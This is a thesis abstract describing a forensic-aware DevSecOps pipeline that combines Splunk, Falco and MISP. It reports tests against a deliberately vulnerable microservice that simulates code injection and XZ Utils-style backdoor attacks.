Forensic-Aware DevSecOps Pipeline: Design, Implementation and Execution against a Purposefully Vulnerable Microservice

This thesis's main objective is the design, implementation, and demonstration of a forensic-aware DevSecOps pipeline, blending proactive DevSecOps practices with reactive forensic analysis capabilities. While existing DevSecOps approaches emphasize early vulnerability detection and the adoption of automation across the software development lifecycle, they sometimes neglect the strong forensic capabilities that are critical to successful post-incident investigations and precise threat attribution. Digital forensic analysis, on the other hand, provides powerful investigative tools, but it exists mostly in reactive cases, often in silos. This work seeks to bridge this gap by making forensic readiness an integral part of the CI/CD pipeline. The pipeline is designed by integrating cutting-edge forensic-ready elements, such as Splunk for centralized log collection, Falco for runtime threat detection in real time, and the Malware Information Sharing Platform (MISP) for threat intelligence correlation and Indicators of Compromise (IoC) identification. The tools are integrated in a systematic way to augment static and dynamic vulnerability detection mechanisms to mitigate well-known shortcomings of traditional security practices, particularly against advanced insider threats and supply chain attacks of high complexity. The experimental section of this thesis consists of the deployment of not just the proposed pipeline but also an intentionally vulnerable microservice. The proof-of-concept application showcases realistic attack patterns like hidden code injection and backdoor insertion, making it possible to test both traditional and forensic-aware pipelines. This dual testing approach proved possible-and beneficial-the addition of automatic detection of emerging and increasingly prevalent attack vectors, including those similar to the XZ Utils backdoor, thereby demonstrating how traditional DevSecOps approaches often fail due to inadequate contextual forensic information and limited traceability. Key benefits of the forensic-aware approach include enhanced vulnerability identification through embedded IoC detection directly on the source code, the ability to perform automated integrity checks on runtime artifacts and CI/CD operations using mechanisms such as checksum validation and log correlation, and improved incident response times. While forensic analysis can never be entirely proactive due to its inherently reactive nature, its strategic integration within the pipeline significantly shortens the gap between detection and response. This approach aligns with the industry-adopted "shift-left" philosophy by extending its reach not only into early-stage prevention but also into real-time contextual detection and forensic preparedness, thereby proposing a significantly more resilient and investigatively capable development environment. In conclusion, this forensic-aware pipeline does not claim to eliminate all threats preemptively. Instead, it redefines the pipeline's role by enabling it to capture forensic signals in real time and use them to inform both detection and attribution. By coupling proactive security measures with systematic forensic instrumentation, the pipeline emerges as a flexible and resilient security architecture-one capable of confronting modern attack scenarios with analytical rigor and operational readiness.